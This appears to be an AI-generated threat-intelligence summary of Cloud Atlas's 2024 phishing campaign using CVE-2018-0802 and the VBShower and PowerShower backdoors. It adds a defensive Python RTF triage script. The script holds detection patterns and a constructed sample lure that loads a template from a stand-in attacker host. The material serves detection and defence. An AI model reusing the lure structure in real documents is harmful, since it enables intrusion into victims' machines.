Cloud Atlas seen using a new tool in its attacks

Threat actor
• Cloud Atlas (active since at least 2014).
Campaign overview
• Targets organizations in Eastern Europe and Central Asia.
• Initial access through phishing emails carrying documents that exploit CVE-2018-0802.
• 2024 toolset: the VBShower and PowerShower backdoors, plus a new backdoor, VBCloud, described in the linked Securelist article.
Target regions
• Eastern Europe, Central Asia
Methodology
• Victims receive phishing emails with a malicious document that exploits the Microsoft Office Equation Editor vulnerability.
• The document fetches a malicious RTF template, which downloads an HTA file; the HTA writes and runs the backdoors (VBShower, PowerShower).
• Payloads are stored in, and executed from, NTFS alternate data streams (ADS) rather than regular files.
Product targeted
• Windows hosts with a Microsoft Office installation whose Equation Editor component (EQNEDT32.EXE) is unpatched.
Malware reference
• VBShower: VBScript backdoor with downloader and file-exfiltration capabilities.
• PowerShower: PowerShell backdoor with similar functionality, focused on downloading and executing further PowerShell scripts.
Tools used
• VBShower: decrypts and executes backdoors and installs additional malware.
• PowerShower: downloads additional PowerShell scripts.
Vulnerabilities exploited
• CVE-2018-0802: memory corruption in the Microsoft Office Equation Editor (EQNEDT32.EXE) that allows code execution when a crafted document is opened.
TTPs
• Phishing emails carrying malicious RTF files.
• NTFS alternate data streams (ADS) used to hide malware on disk.
• Download and execution of additional payloads.
• File exfiltration over WebDAV to cloud storage services.
Attribution
• Cloud Atlas (also tracked as Inception).
Recommendations
• Tighten email filtering for RTF attachments and for documents that load remote templates, and keep Microsoft Office patched; the fix for CVE-2018-0802 shipped in January 2018 and removed the Equation Editor component entirely.
• Monitor for unusual process chains (Office processes, including EQNEDT32.EXE, spawning mshta.exe, wscript.exe or powershell.exe) and for unexpected registry changes.
• Hunt for non-default NTFS alternate data streams on user-writable paths (PowerShell: Get-Item -Path <file> -Stream *).
• Use endpoint detection and response tooling to detect and block malicious PowerShell scripts and unauthorized backdoors.
Source: Securelist by Kaspersky
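The delivery chain in the Methodology and TTPs rows (phishing RTF, remote template, Equation Editor object) leaves static markers that can be triaged before a document is ever opened. The script below is an added example written for this summary, not code from Securelist, Kaspersky or the Cloud Atlas toolset: it scans an RTF for a remote template reference and for an embedded Equation Editor OLE object, the two things a CVE-2018-0802 lure has to carry. The sample documents, the attacker.invalid URL and the "Equation Native" stub payload are constructed for illustration and contain no exploit.

```python
"""Static triage of RTF lures: remote-template loading and embedded
Equation Editor OLE objects (the CVE-2018-0802 delivery vector).

Added example, not code from Securelist or from Cloud Atlas. The sample
documents below are constructed and inert; the URL in them is an assumption.
"""
import re

# Little-endian byte layout of the Equation Editor OLE class id
# {0002CE02-0000-0000-C000-000000000046}, as it appears inside an objdata blob.
EQUATION_EDITOR_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")

# RTF control words of interest. RTF is 7-bit text, so bytes regexes suffice.
TEMPLATE_RE = re.compile(rb"\\\*\\template\s+([^}]+)\}")    # {\*\template <path>}
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^\\}\s]+)")       # {\*\objclass Equation.3}
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")    # {\*\objdata <hex>}


def _decode_objdata(hexblob: bytes) -> bytes:
    """Turn the hex-encoded objdata destination back into raw OLE bytes."""
    compact = re.sub(rb"\s+", b"", hexblob)
    try:
        return bytes.fromhex(compact.decode("ascii"))
    except ValueError:  # odd length or non-hex debris: treat as empty
        return b""


def triage_rtf(data: bytes) -> dict:
    """Return findings for one RTF document.

    remote_template: URL or UNC path the document loads a template from, if any
    objclasses:      every embedded OLE class name
    equation_editor: True if any object targets EQNEDT32.EXE
    verdict:         "suspicious" if either indicator fires, else "clean"
    """
    findings = {
        "remote_template": None,
        "objclasses": [],
        "equation_editor": False,
        "verdict": "clean",
    }

    m = TEMPLATE_RE.search(data)
    if m:
        target = m.group(1).strip().decode("latin-1")
        # A local template path is normal; an http(s) or UNC target means the
        # document pulls its real content from somewhere else at open time.
        if target.lower().startswith(("http://", "https://", "\\\\")):
            findings["remote_template"] = target

    findings["objclasses"] = [c.decode("latin-1") for c in OBJCLASS_RE.findall(data)]
    if any(c.lower().startswith("equation") for c in findings["objclasses"]):
        findings["equation_editor"] = True

    # The class name can be omitted or spoofed, so also inspect the OLE blob itself
    # for the Equation Editor CLSID or its well-known stream name.
    for hexblob in OBJDATA_RE.findall(data):
        blob = _decode_objdata(hexblob)
        if EQUATION_EDITOR_CLSID_LE in blob or b"Equation Native" in blob:
            findings["equation_editor"] = True

    if findings["remote_template"] or findings["equation_editor"]:
        findings["verdict"] = "suspicious"
    return findings


# Constructed sample: an RTF that loads a remote template (assumed URL) and
# embeds an Equation Editor object whose payload is only the stream name.
_FAKE_OLE_BLOB = b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"Equation Native" + b"\x00" * 8
SAMPLE_LURE = (
    b"{\\rtf1\\ansi"
    + b"{\\*\\template http://attacker.invalid/template.rtf}"
    + b"{\\object\\objemb{\\*\\objclass Equation.3}"
    + b"{\\*\\objdata " + _FAKE_OLE_BLOB.hex().encode("ascii") + b"}}"
    + b"\\par Invoice attached.}"
)

# Constructed benign control: an embedded spreadsheet, no remote template.
SAMPLE_BENIGN = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Excel.Sheet.8}"
    b"{\\*\\objdata 0105000002000000}}\\par Quarterly numbers.}"
)

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, triage_rtf(doc))
```

Run it against attachments pulled from the mail gateway; a "suspicious" verdict is a reason to detonate the file or hand it to a full OLE parser, not proof of exploitation. The objdata check matters because the objclass name is optional and attackers have dropped or altered it; the CLSID and the "Equation Native" stream name inside the blob are what actually route the object to EQNEDT32.EXE.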

Read full article: https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/

The above summary has been generated by an AI language model

Published on: December 24, 2024
